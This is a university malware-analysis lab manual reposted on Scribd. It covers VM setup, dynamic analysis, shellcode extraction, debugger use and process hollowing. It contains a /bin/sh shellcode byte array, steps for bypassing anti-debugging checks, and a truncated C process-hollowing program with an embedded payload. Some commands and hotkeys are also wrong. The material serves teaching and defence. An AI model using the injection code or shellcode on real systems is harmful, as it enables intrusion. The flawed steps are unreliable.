KEMBAR78
21CSC310J Malware Analysis Lab Manual | PDF | Virtual Machine | Windows Registry
0% found this document useful (0 votes)
296 views56 pages

21CSC310J Malware Analysis Lab Manual

The document is a laboratory manual for a Malware Analysis course at SRM Institute of Science and Technology, detailing experiments for B.Tech students. It includes instructions for setting up virtual machines, performing dynamic analysis on Windows malware, and using various analysis tools. The manual outlines the required software, experiment procedures, and system configurations necessary for effective malware analysis.

Uploaded by

algatesgiri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
296 views56 pages

21CSC310J Malware Analysis Lab Manual

The document is a laboratory manual for a Malware Analysis course at SRM Institute of Science and Technology, detailing experiments for B.Tech students. It includes instructions for setting up virtual machines, performing dynamic analysis on Windows malware, and using various analysis tools. The manual outlines the required software, experiment procedures, and system configurations necessary for effective malware analysis.

Uploaded by

algatesgiri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 56

SRM INSTITUTE OF SCIENCE AND TECHNOLOGY

RAMAPURAM CAMPUS, CHENNAI- 600089.


FACULTY OF ENGINEERING AND TECHNOLOGY
SCHOOL OF COMPUTER SCIENCE ENGINEERING
DEPARTMENT OF CYBER SECURITY

LABORATORY MANUAL
21CSC310J : MALWARE ANALYSIS

CLASS : B.Tech. [U.G]


YEAR : III YEAR
SEM. : VI

Prepared By
Dr. M.Azhagiri
Associate Professor
Computer Science and Engineering
SRM Institute of Science And Technology
Ramapuram Campus, Chennai- 600089
LIST OF EXPERIMENT

S.NO EXPERIMENT NAME


1. Setting up and configuring Windows and Linux VM.

2. Perform dynamic analysis on different families of Windows Malware

3. Perform shell code analysis in x86 architecture

4. Analyse malware binary using debugging tools

5. Covert Malware Launching

LIST OF REQUIRED SOFTWARE


Required Software
1. Windows Operation System
2. Virtual Machine
3. Unix Operating system
4. PEiD
5. IDA Pro
6. VirusTotal
7. Procmon (Process Monitor)
8. Process Explorer
9. Wireshark
10. INetSim
11. Noriben
12. x64dbg
13. OllyDbg
14. WinDbg
EXP No: 1
Setting up and configuring Windows and Linux VM.
Date :

Aim: To Set up and configure Windows and Linux VM.


System Requirements:
Operating System: Windows 10
Processor: 2 GHz dual-core Processor or Above
System Memory: 8 GB or higher
Storage: 500 GB or higher
Procedure:
STEP 1:
Install VirtualBox
Download and install the Oracle VM VirtualBox
To download the Oracle VM VirtualBox on Windows, go to
https://www.virtualbox.org/wiki/Downloads and select the ‘Windows hosts’ option.
STEP 2:
Set Up the Virtual Machine
Download the Linux OS
They include the more common Kali Linux, Ubuntu, and Red Hat, and the less common
Peppermint OS, Parrot OS, BlackArch and more.
Note: We’ll use Ubuntu, based on Debian, for this demonstration.
To download Ubuntu, go to https://ubuntu.com/download/desktop and download the latest
version, Ubuntu 22.04.3 LTS and Ubuntu 23.04
STEP 3:
Launch the VirtualBox
To begin the Ubuntu installation process, launch the Oracle VM VirtualBox.
Click ‘Machine’ in the top left corner and then ‘New.’

Figure: Creating a new Virtual Machine in the VirtualBox

STEP 4:
Name the Virtual Machine
In the ‘Name’ field, type in a unique name for your Virtual Machine.
The other fields differ from the image below, do not alter them. Click ‘Next’ to proceed.

Figure: Creating and Naming the Virtual Machine

STEP 5:
Provision the hardware
Since the virtual machine is also a computer, it’ll need its own Processor and memory. But as a
virtual machine, it can only get that from the host (physical) computer.

Decide how much of the host resources the virtual machine can use; the more you give it, the
better it’ll run its processes.
Provide 8 GB (8000 MB) for the Base Memory and 2 of the 4 available CPUs for the Processor.
Click ‘Next.’

Figure: Provisioning the hardware for the Virtual Machine

STEP 6:
Create a virtual hard disk
Like the step above, you will create a virtual hard disk (VHD) for the VM.
Provide at least 25 GB for the VHD. Click ‘Next.’

Figure : Creating a virtual hard disk


STEP 7:
Create the Virtual Machine
Review the settings and ensure everything is set right. Click ‘Finish’ to create the Virtual
Machine.
Note: After creating the VM, you can still adjust the provisions.

Figure: Creating the Virtual Machine

We can see our virtual machine in the left panel and to the right, basic info about the VM.

Figure : Successful creation of the Virtual Machine

STEP 8:
Upload the Ubuntu iso file
The VM is ready; it’s time to install the operating system. This is where we use the Ubuntu iso
file we downloaded earlier.
At the top of the page, open the ‘Settings’ page and go to ‘Storage.’
Under ‘Storage Devices,’ select ‘Empty.’
Then to the right, under ‘Attributes,’ select the ‘blue disc’ to upload the ‘Optical Drive.’
‘Choose a disk file’ will lead you to your file manager; click the Ubuntu iso file to upload.

Figure : Uploading the Ubuntu iso file in the storage

STEP 9:
Adjust the display
In ‘Display,’ under ‘Screen,’ slide the ‘Video Memory’ to the max. This is important so the VM
has enough resources for optimal visuals.
Click ‘OK’ when done.
Figure Adjusting the Video Memory in Display Settings

STEP 10:
Install Ubuntu
Launch Ubuntu via Virtual Box
With the Ubuntu VM selected on the VirtualBox, click the green ‘Start’ arrow at the top to launch.

STEP 11:
Boot
The boot process will begin once you hit Start.
Select the ‘Try or Install Ubuntu’ option
(it should be auto-selected; else, use the up and down arrows) and hit enter.

Figure The Ubuntu boot page


Figure Ubuntu booting

Figure Ubuntu
booted

STEP 12:
Install Ubuntu
On the Welcome page, choose your preferred language
Then click ‘Install Ubuntu.’

Figure Ubuntu welcome page


STEP 13:
Select the keyboard layout
Next, select a keyboard layout (your VM’s language), then click ‘Continue’ in the bottom right.

Figure : choosing the keyboard layout

STEP 14:
Updates and other software
Select the ‘Normal Installation’ option and continue; leave the others unchecked.

Figure: Updates and other software


STEP 15:
Choose the installation type
Select the ‘Erase disk and install Ubuntu’ option, then click ‘Install Now.’
Note: Ignore the warning message; it’s meant for the Virtual Machine and will not affect your host
(physical) computer.

Figure: Installation type

Figure : Write the changes to disk pop-up

STEP 16:
Choose a location
Move the cursor to a location and select, then click ‘Continue.’
Figure: Choosing a location for your Virtual Machine

STEP 17:
Input user credentials
Next, you fill in the fields with your name, computer’s name, username and password; pick a good
password.
Select ‘Require my password to log in’ and click ‘Continue.’

Figure: Inputting user credentials


Figure Ubuntu VM running on Windows host

Fix the Resolution


Step 1: Ubuntu is successfully installed
If you haven’t tried to maximize or expand the screen, you can try it now, and you’ll notice an
issue with the resolution.
Figure : Ubuntu Home Screen with Wrong Resolution

Step 2: Insert Guest Additions CD Image


To fix this, go to the top left corner of the screen and click on ‘Devices,’ then on ‘Insert Guest
Additions CD Image.’

Figure : Inserting Guest Additions CD Image

A Silver disc icon should appear on the side panel of your Ubuntu home screen. You may need
to scroll a bit to find it.
Step 3: Launch Guest Additions CD Image
Double-click the icon to launch.
Right-click a blank space and then ‘Open in Terminal.’ You’ll be conducting a simple Linux
terminal task with basic commands.
Step 4: In the Terminal
In the Terminal, run the ‘ls’ command. Look for the ‘VBoxLinuxAdditions.run’ file and copy it.

Step 5: Run this command


Next, we need to execute the file using this command:
“sudo ./VBoxLinuxAdditions.run”
The Terminal will request an administrative password. Input your login password.

Step 6: Restart the VM


When the command is done running, go to the top right corner of the VM and click where you
see the ‘Network, Speaker and Battery’ icons.
In the drop-down menu, click ‘Power Off/Log Out,’ then ‘Restart.’

A pop-up with a 60-second timer will ask you to confirm restart; click ‘Restart’ again.
Step 7: Minimize and Maximize
These steps should fix the resolution. Simply minimize and maximize the Ubuntu VM to
confirm.
Step 8: Ubuntu is finally ready for use
Now, your Linux Virtual Machine is ready for use in widescreen mode. You can run it like you
would run your host computer.

Result
Thus the Setting up and configuring of Windows and Linux VM has been done successfully.
EXP No: 2
Perform dynamic analysis on different families of Windows Malware
Date:

AIM

To analyze the behavior of different families of Windows malware in a controlled environment using
dynamic analysis tools.

Prerequisites

 A powerful host system (at least 16GB RAM, multi-core processor, SSD storage).
 Virtualization software (VMware Workstation, VirtualBox, or Hyper-V).
 An isolated network to prevent malware from spreading.
 A Windows-based VM (Windows 10, or 11).
Required analysis tools installed:

 Process Monitor (ProcMon) – Monitors real-time system activities


 Process Explorer – Examines running processes
 Wireshark – Captures network traffic
 RegShot – Compares registry changes
 Noriben – Automates ProcMon logging
 INetSim – Simulates network services
 rundll32.exe – Used for DLL analysis
Procedure

TASK - 1

Step 1: Set Up the Isolated Environment

 Setting Up the Virtual Machine (VM)


 Install a Virtual Machine
 Install VMware Workstation or VirtualBox on your host system.
Download a Windows ISO (Windows 10, or 11).

Create a new VM with:

2+ CPU cores

4GB+ RAM

60GB+ storage

Bridged/NAT network (optional)

 Install Windows OS on the VM.


Step 2: Configure Network Isolation
Disable Internet Access

Go to VM settings → Network Adapter → Set to Host-Only (prevents malware from communicating


externally).

Alternatively, use NAT with firewall rules to block suspicious traffic.

Use INetSim for Fake Network Services (Optional)

Install INetSim in another Linux VM to simulate the internet.

This prevents malware from detecting the lack of internet.

Step 3: Secure the VM

Take an Initial Snapshot

After setting up Windows, take a VM snapshot for easy restoration.

In VMware: VM → Snapshot → Take Snapshot

Disable Windows Defender & Firewall

Go to Windows Security → Virus & Threat Protection → Disable real-time protection.

Turn off the firewall to allow network monitoring tools to function.

Disable Automatic Updates & System Restore

Prevent unintended OS updates or rollbacks that interfere with analysis.

Step 4: Install Analysis Tools

Process Monitor (ProcMon) – Logs real-time process and registry activity.

Process Explorer – Shows detailed process information.

Wireshark – Captures network traffic.

RegShot – Compares system registry before and after malware execution.

Noriben – Automates ProcMon logging.

INetSim (on a Linux VM) – Simulates fake network services.

Fakenet-NG – Redirects malware traffic to a local monitoring interface.

rundll32.exe (Windows Built-in) – Used to execute DLL malware.


Running Malware Safely

Start monitoring tools (ProcMon, Wireshark, RegShot, etc.).

Execute the malware and observe its behavior.

Save logs and take a new RegShot snapshot.

Analyze the logs for registry changes, network activity, and file system modifications.

Revert VM to the snapshot or delete the clone after analysis.

TASK – 2

Steps to Capture the Initial System Baseline

Step 1: Process Monitoring (Using Process Monitor - ProcMon)

Download and extract Process Monitor (ProcMon) from Microsoft Sysinternals.

Run Procmon.exe as Administrator.

Configure the filters:

Click Filter → Filter…

Add rules:

Path contains C:\Users\ (for user-space activity)

Operation is WriteFile (to track file modifications)

Operation is RegSetValue (to track registry changes)

Start logging and observe running processes.

Save the log before executing malware (File → Save → PML format).

Step 2: Process Snapshot (Using Process Explorer)

Download and run Process Explorer from Microsoft Sysinternals.

Click File → Save As to store a list of running processes.

Capture active DLLs by clicking View → Lower Pane → DLLs.

Save the output for comparison after execution.


Step 3: Registry Baseline (Using RegShot)

Download RegShot from sourceforge.net.

Run RegShot.exe as Administrator.

Click 1st shot to take an initial registry snapshot.

Save the snapshot (regshot1.txt).

Step 4: File System Baseline (Using Dir /S Command)

Open Command Prompt (cmd.exe) as Administrator.

Run:

sh

Copy

Edit

dir C:\ /s /b > C:\baseline_files.txt

This saves a list of all files and directories.

Use WinDiff or FC (File Compare) tool to compare post-execution changes.

Step 5: Network Baseline (Using Wireshark )

Open Wireshark and select the active network adapter.

Start capturing packets (Capture → Start).

Save the baseline .pcap file before executing malware.

Steps (INetSim - For Fake Internet Simulation)

TASK – 3

Executing the Malware in an Isolated Environment

Step 1: Start System Monitoring Tools

Process Monitor (ProcMon)

Start ProcMon to capture process activity, file modifications, and registry changes.
Process Explorer

Monitor active processes and new process creations.

RegShot

Take a 1st snapshot of the registry before executing the malware.

Wireshark

Start capturing network packets.

Noriben (Optional, for automated logging)

Run Noriben (python Noriben.py) to log suspicious activity.

Step 2: Execute the Malware

Run the Malware Executable

If the malware is an .exe file, double-click to execute.

If the malware is a DLL, use rundll32.exe:

sh

Copy

Edit

rundll32.exe malware.dll,EntryPoint

If the malware is a script (VBS, JS, BAT, PowerShell), execute it via the command prompt.

Observe Immediate Effects

Does the malware create new processes?

Does it drop additional files?

Is there a spike in CPU or memory usage?

Check for Persistence Mechanisms

Some malware adds itself to Startup (Registry Run keys) or scheduled tasks.

Use autoruns.exe (from Sysinternals) to check persistent entries.

Step 3: Monitor and Capture Changes


Process Activity

Monitor ProcMon for new processes, DLL injections, and file changes.

Look for suspicious process names like svchost.exe running from unusual locations.

Registry Changes

Take a 2nd snapshot in RegShot and compare it with the 1st snapshot.

File System Changes

Run:

sh

Copy

Edit

dir C:\ /s /b > C:\post_execution_files.txt

Compare this file with baseline_files.txt to detect new files.

Network Activity

Check Wireshark for outbound connections.

Step 4: Analyze the Results

Compare ProcMon logs before and after execution.

Check RegShot output for registry modifications.

Review Wireshark packet captures for suspicious traffic.

Identify new files created by the malware.


Check Windows Event Logs for additional insights (eventvwr.msc).

TASK 4
Analyzing Malware Behavior after Execution
Step 1: Process Analysis (Using ProcMon & Process Explorer)

Check Process Monitor (ProcMon) Logs


Open ProcMon and filter logs by:

Process Name: Look for unknown or suspicious processes.

Operation: Focus on CreateProcess, WriteFile, RegSetValue.

Path: Check if malware modifies system files (e.g., C:\Windows\System32).

Export logs (File → Save → PML Format) for further review.

Use Process Explorer to Inspect Running Processes

Look for unusual processes (e.g., high CPU usage, unsigned processes).

Identify parent-child relationships (malware often spawns multiple processes).

If malware injects into another process, right-click the process → Properties → Check loaded DLLs.

Step 2: Registry Analysis (Using RegShot & Autoruns)

Compare RegShot Snapshots

Open RegShot and load the before & after snapshots.

Click "Compare" and review changes in:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run (Auto-start entry).

HKCU\Software\Microsoft\Windows\CurrentVersion\Run (User-level persistence).

HKLM\System\CurrentControlSet\Services (Newly created services).

HKCR\exefile\shell\open\command (File association hijacking).

Save the registry changes report for further analysis.

Check Persistence with Autoruns

Run Autoruns (autoruns64.exe from Sysinternals).

Look for malware entries under Logon, Services, Scheduled Tasks.

If an unknown entry appears, check its file location & hash.

Step 3: File System Analysis (Using Dir & Hashing Tools)

Compare File System Changes

Run the following command to compare before and after execution:

sh
Copy

Edit

fc C:\baseline_files.txt C:\post_execution_files.txt

Check if malware dropped files in:

%TEMP%

%APPDATA%

C:\Windows\System32

Generate File Hashes for Detection

Use PowerShell to generate hashes:

powershell

Copy

Edit

Get-FileHash C:\path\to\malware.exe -Algorithm MD5

Upload the hash to VirusTotal (www.virustotal.com) to check if it’s known malware.

Step 4: Network Traffic Analysis (Using Wireshark & INetSim)

Check Wireshark for Suspicious Traffic

Open Wireshark and filter for:

http → Malware calling external servers.

dns → Malware resolving domains.

tcp.port == 4444 (Common for reverse shells).

If malware is contacting an IP, lookup the domain using:

sh

Copy

Edit

nslookup [IP]

Check for encrypted or encoded traffic (malware often uses base64 or XOR encryption).

Use INetSim to Capture Fake C2 Requests


If malware tries to connect to a C2 server, INetSim will respond with fake data.

Check inet-sim.log to see which domains/IPs the malware attempted to contact.

Step 5: Identify Malware Capabilities

Creates new processes (e.g., cmd.exe, powershell.exe)  RAT, Trojan

Modifies Registry Keys Worm, Rootkit

Drops files in System32 or TEMP folder  File Infector

Contacts a remote server on port 80, 443, 4444 Botnet, Backdoor

Encrypts files with .locked extension  Ransomware

TASK 5

Generating Reports and Cleanup after Malware Analysis

Step 1: Generate a Detailed Malware Analysis Report

Report Structure

Section Details to Include

Malware Sample Info Name, File Hash (MD5/SHA256), File Size, Source

Execution Behavior Processes created, registry modifications, file changes

Network Activity Domains contacted, IPs, Protocols (HTTP, TCP, DNS)

Persistence Mechanisms Registry changes, scheduled tasks, startup entries

Indicators of Compromise (IoCs) File paths, Registry keys, C2 domains, IPs

Detection and Mitigation VirusTotal results, remediation steps

Automate Report Generation (Python Script)

import os

from datetime import datetime

def generate_report():

timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

report_filename = f"Malware_Report_{timestamp}.txt"
with open(report_filename, "w") as report:

report.write(f"Malware Analysis Report - {timestamp}\n")

report.write("="*50 + "\n")

# Collect Process Monitor logs

if os.path.exists("procmon_log.pml"):

report.write("\n[Process Monitor Logs]\n")

report.write("Review 'procmon_log.pml' in ProcMon.\n")

# Collect Registry changes

if os.path.exists("regshot_diff.txt"):

report.write("\n[Registry Changes]\n")

with open("regshot_diff.txt", "r") as reg_diff:

report.write(reg_diff.read())

# Collect Network Logs

if os.path.exists("network_capture.pcap"):

report.write("\n[Network Traffic]\n")

report.write("Analyze 'network_capture.pcap' in Wireshark.\n")

# Collect File System Changes

if os.path.exists("file_changes.txt"):

report.write("\n[File System Changes]\n")

with open("file_changes.txt", "r") as file_changes:

report.write(file_changes.read())

report.write("\n[Indicators of Compromise (IoCs)]\n")

report.write("- Review logs for persistence mechanisms, file drops, and network activity.\n")
print(f"Report generated: {report_filename}")

# Run the report generation

generate_report()

Step 2: Cleanup the Analysis Environment

After executing and analyzing the malware, it’s critical to clean up the environment.

Steps to Restore the VM to a Clean State

Revert the Virtual Machine Snapshot

In VMware/VirtualBox, restore to the last clean snapshot before malware execution.

Manually Remove Malware Artifacts (If No Snapshot)

Delete suspicious files from %TEMP%, %APPDATA%, System32.

Remove malware startup entries using Autoruns.

Delete registry keys modified by the malware (Use regedit.exe).

Restart the system in Safe Mode and scan with Windows Defender or Malwarebytes.

Securely Wipe Malware Sample

DO NOT delete normally; instead, use:

sh

Copy

Edit

sdelete -p 3 malware.exe # Securely delete file with 3-pass overwrite

Or use shred (on Linux-based VMs):

sh

Copy
Edit

shred -n 3 -u malware.exe

Check for Network Connections Still Open

Run:

sh

Copy

Edit

netstat -anob

If suspicious connections exist, use:

sh

Copy

Edit

taskkill /F /PID [ProcessID]

Flush DNS Cache (To clear malware-related network resolutions)

sh

Copy

Edit

ipconfig /flushdns

Final Full System Scan

Use Windows Defender, Malwarebytes, or ClamAV to scan the system.

Result

Thus the Performance of Dynamic Analysis on Different Families of Windows Malware has been done
successfully
EXP No: 3
Performing shell code analysis in x86 architecture
Date :

AIM

To perform shellcode analysis in the x86 architecture involves several steps, including static analysis,
dynamic analysis, and debugging.

Procedure

1. Identify and Extract the Shellcode

Extract the shellcode from a binary, exploit, or memory dump.

Convert shellcode into a readable format (e.g., hexadecimal or assembly).

Identifying and Extracting Shellcode in x86 Architecture

When analyzing a suspicious binary or exploit payload, the first step is to identify and extract the shellcode
for further analysis. This process involves locating raw shellcode in files, memory dumps, or exploit scripts.

Identifying Shellcode

A. Common Shellcode Patterns

Shellcode often contains:

NOP Sleds (0x90 0x90 ... 0x90): Used for padding.

Hexadecimal Encoded Opcodes: Usually written as \x format (e.g., \x31\xc0\x50\x68...).

Encoded or Obfuscated Instructions: XOR, base64, or other encoding techniques.

Identifying Shellcode in Exploit Code

Inline Assembly Code (asm(""))

Character Arrays Containing Hex Values:

unsigned char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68",

"\x68\x2f\x62\x69\x6e\x89\xe3\x50"

"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

Obfuscated Shellcode

encoded_shellcode = "\x90\x90" + "".join(chr(ord(c) ^ 0xAA) for c in shellcode)


Extracting Shellcode

Once identified, extract the shellcode for further analysis.

A. Extract from a Binary Using objdump

If you suspect shellcode is inside an ELF binary:objdump -d ./suspicious_binary | awk '/<main>:/,/^$/' >
shellcode.asm

B. Extract from a Memory Dump

If analyzing a memory dump, use strings or binwalk:

strings memdump.bin | grep -E "[\x00-\x7F]{4,}"

binwalk -e memdump.bin # Extract embedded shellcode

Extract from a Network Capture (pcap file)

tshark -r traffic.pcap -Y "data.data" -T fields -e data | xxd -r -p > shellcode.bin

Convert Shellcode to a Usable Format

Once extracted, convert it into a raw binary format for execution in a debugger.

A. Save Hex Bytes as a Binary File

If extracted shellcode is in hex:

A. Save Hex Bytes as a Binary File

If extracted shellcode is in hex:

echo -ne
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
" > shellcode.bin

B. Disassemble with ndisasm

To view assembly:

ndisasm -b 32 shellcode.bin

C. Convert ASCII Hex to Binary (xxd)

If you have hex format:

xxd -r -p shellcode.hex > shellcode.bin

Verify the Extracted Shellcode

To check if the shellcode is valid, run it in a controlled environment.


A. Check the File Type

file shellcode.bin

B. Check for Executable Sections

readelf -a shellcode.bin | grep "EXEC"

C. Run in a Debugger (gdb)

gdb -q ./shellcode.bin

(gdb) disassemble main

(gdb) break *0x08048400 # Set breakpoint at shellcode start

(gdb) run

Result
Thus the shell programming has been done successfully.
EXP No: 4 (i)
Analyze malware binary using debugging tools
Date :

Aim:
To understand the working of x64dbg, a powerful debugging tool used for reverse engineering and malware
analysis.

Software Requirements

✅ Windows OS (Sandbox or VM Recommended)

✅ x64dbg (Download from https://x64dbg.com/)

1. Install x64dbg

✅ Download and extract x64dbg.

✅ Run x64dbg.exe for 64-bit binaries or x32dbg.exe for 32-bit binaries.

✅ Ensure administrator privileges to debug system applications.

2. Load an Executable in x64dbg

✅ Click "File" → "Open" and select the executable (.exe).

✅ The debugger will pause at the program entry point (ntdll.dll).

✅ Press F9 to let the program run to the main entry point.


X64dbg Main Toolbar

The following icons are pretty straightforward:

The folder icon is used to open a file for analysis


The circular arrow is used to return to the start of the program
The stop icon stops the program if it is running in x64dbg
The arrow icon will run the program
The pause icon will pause the program

The row of tabs at the bottom of the image contains various views and data which can be used to make
the analysis easier.

CPU: Displays the assembly code from top to bottom


Graph: Shows a graph view so the user can see visually which function is called by another. This is
similar to other tools such as IDAPro and Ghidra.

Breakpoints: It’s possible to search for instructions or strings that may be of interest and set breakpoints
against these instructions. x64dbg then allows the user to run the program until it hits this breakpoint so it
can then be analyzed.
Memory Map: This shows what data is stored in memory and the addresses where that data resides. In the
example below the ‘.text’ section of the malware being analyzed is located at the address ‘00F21000’. The
‘Protection’ column also shows if that area in memory is executable, readable or writable. These can be
identified by the flags E, R and W. This will come in handy when I explain how to use the memory map to
unpack a piece of malware.

Call Stack: This is handy when a breakpoint has been set on a specific Windows function. In a previous
image, I had a breakpoint set on ‘CreateDirectoryW’ so each time the malware begins to create a directory
on a compromised device, this breakpoint will be hit and x64dbg will stop on this function. Using the call
stack I can see what code written by the malware author called ‘CreateDirectoryW’ and identify where that
directory is being created and what it will be called.
X64dbg Main Window

The main window in x64dbg contains the content of the tab that has been selected, by default this is the
CPU tab that contains the assembly instructions.

The first column contains the EIP, which is the instruction pointer. This simply points to the next piece of
code which will be run.
The second column contains addresses within the binary where instructions reside, so in the above
example the EIP is pointing to the address ‘0138CD97’.
The third column is the hexadecimal representation of the instruction in column 4.
Column 4 is where the assembly instructions are located, again the above example shows the EIP
pointing to the next instruction to be run is ‘push ebp’.
The fifth column will contain data populated by x64dbg or notes that have been added by the analyst. The
above example shows that ‘0138CD97’ is the ‘EntryPoint’ of the malware, this means it is the start of the
malware authors code and where the main function begins.
The third column, which contains the assembly instructions, is probably the most important as this data is
what a malware analyst will use to understand what the malware is doing.

x64dbg Window Relating to Registers


The next window contains information relating to the registers.

The registers are used by a program to store data which can then be easily referenced for later use, some
of them have specific uses.

EAX: Used for addition, multiplication and return values


EBX: Generic register, used for various operations
ECX: Used as a counter
EDX: Generic register, used for various operations
EBP: Used to reference arguments and local variables
ESP: Points to the last argument on the stack
ESI/EDI: Used in memory transfer instructions

x64dbg Window Relating to Stack Memory

x64dbg Window Containing Stack and Data


x64dbg Window Containing Dump Data

Result:
After successfully conducting the experiment on x64dbg, Successfully loaded and analyzed an executable
in x64dbg, Set breakpoints on specific functions and observed execution flow, Stepped through instructions
and monitored register changes, Modified CPU registers and memory to alter program behavior, Dumped
and patched the executable for further analysis.
EXP No: 4 (ii)
Analyze malware binary using debugging tools - OLL
Date :

AIM
To understand the working of OllyDbg, a dynamic debugger used for reverse engineering and malware
analysis.
Procedure
1. Install and Launch OllyDbg

✅ Download and extract OllyDbg.

✅ Run OllyDbg.exe as Administrator.

✅ The main interface will open with different sections like the CPU view, memory dump, and register
panel.
2. Load an Executable into OllyDbg

✅ Click "File" → "Open" and select the executable (.exe).

✅ OllyDbg will analyze and disassemble the program.

✅ The Entry Point (EP) of the program will be highlighted.


3. Analyzing the Program

✅ The CPU window displays Assembly code (Disassembly view).

✅ The Registers panel shows the current values of CPU registers (EAX, EBX, EIP, etc.).

✅ The Stack view represents memory locations used for function calls and variables.
4. Setting Breakpoints

✅ Locate a function or instruction to analyze.

✅ Right-click an instruction → "Breakpoint" → "Toggle" (F2).

✅ Run the program (F9) and observe when execution halts at the breakpoint.

Example: Set a Breakpoint on MessageBoxA


Search for MessageBoxA in the Executable Modules section (Ctrl+E).
Double-click MessageBoxA to navigate to the disassembly.
Right-click the function → Set Breakpoint (F2).
Run the program and observe when MessageBoxA is executed.

5. Stepping Through Code


✅ Use the following debugging options:

F7 – Step into a function.


F8 – Step over an instruction.
Shift + F7 – Step out of a function.

✅ Observe register changes and stack modifications as the program executes.

6. Modifying Registers and Memory

✅ Modify a register value:


Right-click on EAX in the Registers panel.
Select Modify and change its value.

✅ Edit memory values:


Open Memory Dump (Alt + M).
Locate an address, right-click → Modify.

7. Detecting and Bypassing Anti-Debugging Techniques

✅ Check if IsDebuggerPresent is being called:


Search for IsDebuggerPresent in Import Address Table (IAT) (Ctrl + N).
Set a breakpoint, and modify its return value to 0 to bypass detection.

✅ Bypass NtQueryInformationProcess:
Locate NtQueryInformationProcess in the API calls.
Modify the return value to trick the program into thinking a debugger is not present.

8. Patching and Dumping an Executable

✅ Patch an Instruction:
Right-click an instruction → Assemble.
Modify the assembly code (e.g., replace JNZ with JMP).

✅ Dump a Process:
Use Plugins → OllyDump.
Select the running process and dump the modified binary.

Expected Output

🔹 Successfully loaded an executable in OllyDbg.


🔹 Set breakpoints and controlled execution flow.

🔹 Stepped through instructions and analyzed code behavior.

🔹 Modified registers and memory dynamically.

🔹 Bypassed anti-debugging techniques like IsDebuggerPresent.

🔹 Patched and dumped an executable for further analysis.

Result
After completing the experiment, the following objectives were successfully achieved: Understanding the
functionality of OllyDbg, Debugging an executable and analyzing its behavior, Setting breakpoints and
stepping through instructions, Modifying registers and memory to manipulate program execution,
Bypassing basic anti-debugging techniques, Patching and dumping an executable for further investigation.
EXP No: 4 (iii)
Analyze malware binary using debugging tools- IDA PRO
Date :

Aim
The aim of this experiment is to understand the Interactive Disassembler (IDA Pro) and its role in reverse
engineering and malware analysis. This experiment will demonstrate how to:

✅ Load and analyze an executable in IDA Pro.

✅ Understand the graphical disassembly view.

✅ Identify and analyze functions, strings, and imports.

✅ Modify and rename variables for better understanding.

✅ Use cross-references (XREFs) to track function calls.

✅ Convert assembly code into pseudocode using IDA's decompiler.

Lab Requirements
Software

✅ Windows/Linux OS (Sandbox or VM Recommended)

✅ IDA Pro (Free or Paid Version) (Download from https://hex-rays.com/)

✅ Sample executable file (e.g., a simple C program or malware sample)

Step-by-Step Procedure
1. Install and Launch IDA Pro

✅ Download and install IDA Pro.

✅ Run IDA Pro and select "New" → "Load a New File".

✅ Choose a sample executable (.exe, .dll, or .bin).

2. Analyze the Executable in IDA Pro

✅ After loading, IDA Pro will analyze the executable and display:
Disassembly View (Assembly instructions)
Graph View (Control flow representation of functions)
Function Names, Imports, and Strings

✅ Navigate to the Entry Point (EP) of the program.


3. Understanding the Graph View

✅ Press SPACE to toggle between Graph View and Text View.

✅ Identify function calls using control flow graphs (CFGs).

✅ Functions are represented as basic blocks, showing their execution path.

4. Identifying Functions and Strings

✅ Click on the "Functions Window" (Shift + F3) to see all identified functions.

✅ Click on the "Strings Window" (Shift + F12) to find text used by the program.

✅ If a string is found (e.g., "Enter Password"), use cross-references (XREFs) to find where it is used in
the program.

5. Using Cross-References (XREFs)

✅ Right-click on a function or string → "Jump to XREFs".

✅ This shows all locations where the function is called or the string is used.

✅ Helpful for finding the logic behind user input validation (e.g., password checks).

6. Viewing Imports and API Calls

✅ Open the Imports Window (Shift + F3) to see all Windows API functions used by the program.

✅ Identify security-sensitive functions like:

GetProcAddress → Dynamically loading functions


VirtualAlloc → Allocating memory (possible shellcode execution)
IsDebuggerPresent → Checking if a debugger is attached

✅ Double-click on an imported function to see where it is used in the program.


7. Decompiling Code into Pseudocode

✅ If using IDA Pro with Hex-Rays Decompiler:


Select a function.
Click "View" → "Open Subviews" → "Pseudocode" (F5).
The function is converted into C-like pseudocode for better readability.

✅ This helps understand the program logic without reading raw assembly code.
8. Renaming Functions and Variables

✅ Rename an unknown function:


Right-click on a function → "Rename" (N).
Give it a meaningful name (e.g., check_password).

✅ Rename a variable:
Click on a variable in the decompiler view.
Press N and assign a readable name.

Expected Output

🔹 Successfully loaded and analyzed an executable in IDA Pro.

🔹 Identified functions, strings, and imports.

🔹 Used cross-references (XREFs) to trace program flow.

🔹 Converted assembly to pseudocode for better readability.

🔹 Renamed functions and variables for easier understanding.

Result
After completing this experiment, the following objectives were achieved:

 Understanding IDA Pro's disassembly and graph views.


 Analyzing program logic without running the executable.
 Using XREFs to track function calls and string usage.
 Identifying key API functions related to malware behavior.
 Converting assembly code to pseudocode for readability.
EXP No: 5 (i)
Process Injection using Process Hollowing
Date :

Aim:
To understand the Process Hollowing technique used by malware in a controlled environment and to
detect and analyze the injected process using forensic tools.
Required Tools

 Windows Virtual Machine


 C/C++ Compiler (MinGW or Visual Studio).
 Process Hacker / Process Explorer.
 x64dbg / OllyDbg.
 Windows Sysinternals Suite (for forensic detection).
Process Hollowing Code in C
#include <windows.h>

#include <stdio.h>

int main() {

STARTUPINFO si = {0};

PROCESS_INFORMATION pi = {0};

CONTEXT ctx;

LPVOID pRemoteBuffer;

SIZE_T bytesWritten;

// Payload (Shellcode)

unsigned char payload[] =

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c"

"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10"

